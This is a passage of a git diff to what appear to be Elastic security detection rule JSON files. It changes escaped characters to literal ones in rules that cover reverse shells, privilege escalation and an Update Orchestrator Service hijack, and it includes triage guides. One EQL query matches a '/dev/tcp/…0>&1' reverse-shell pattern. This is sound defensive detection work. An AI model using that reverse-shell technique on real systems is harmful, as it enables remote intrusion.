b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json index bafe0ef8598..f97a4a19478 100644 --- a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Background Process", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0\u003e\u00261*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "related_integrations": [ { "package": "endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json index 173d36a7045..04fc9c6a520 100644 --- a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Background Process", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0\u003e\u00261*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", "related_integrations": [ { "package": "endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json index 11fd6c57f16..3ab111d09e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json +++ b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -68,7 +68,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json index 926b7e1f8e1..07952fbf413 100644 --- a/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/260486ee-7d98-11ee-9599-f661ea17fbcd_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json index d7f49958db0..c161b677a2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_1.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json index 5034ebe8d7d..37f557064db 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_2.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json index 5f5344b526c..3afca9331c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_3.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json index 84ec605e200..361847b92ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_4.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json index 36de3d9f109..0fc520b2502 100644 --- a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json index ef0c23e0cc8..667ac89a3a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2636aa6c-88b5-4337-9c31-8d0192a8ef45_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json index 603337b4818..a2cd76c0548 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json index 5a40b140692..f8c823a9721 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json index e9c9f2a48b8..1aedcc75baf 100644 --- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - 